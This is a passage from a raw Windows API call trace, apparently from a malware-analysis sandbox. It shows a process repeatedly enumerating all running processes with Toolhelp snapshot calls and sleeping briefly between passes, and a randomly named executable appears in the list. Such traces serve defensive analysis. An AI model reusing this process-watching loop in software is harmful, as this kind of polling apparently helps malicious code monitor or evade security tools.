lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0222.941] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0222.941] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.941] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0222.941] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.942] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0222.942] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0222.942] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0222.943] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0222.943] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.943] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.943] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.944] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.944] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.944] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0222.944] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.945] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.945] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0222.945] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.946] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0222.946] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0222.946] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.946] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0222.947] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0222.947] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0222.947] Process32NextW (in: hSnapshot=0x258, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0222.948] Sleep (dwMilliseconds=0x64) [0223.079] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x25c [0223.080] Process32FirstW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.080] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0223.081] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0223.081] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.081] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0223.082] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.082] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0223.082] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0223.082] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0223.083] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0223.083] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.083] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.084] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.084] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.084] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.084] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0223.085] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.085] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.085] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0223.086] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.086] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0223.086] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0223.086] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.087] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0223.087] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0223.087] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0223.087] Process32NextW (in: hSnapshot=0x25c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0223.088] Sleep (dwMilliseconds=0x64) [0223.189] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x260 [0223.190] Process32FirstW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.190] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0223.191] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0223.191] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.191] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0223.192] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.192] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0223.192] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0223.192] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0223.193] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0223.193] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.193] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.193] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.194] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.194] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.194] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0223.195] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.195] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.195] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0223.195] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.196] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0223.196] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0223.196] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.197] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0223.197] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0223.197] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0223.197] Process32NextW (in: hSnapshot=0x260, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0223.198] Sleep (dwMilliseconds=0x64) [0223.303] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x264 [0223.304] Process32FirstW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.305] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0223.305] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: 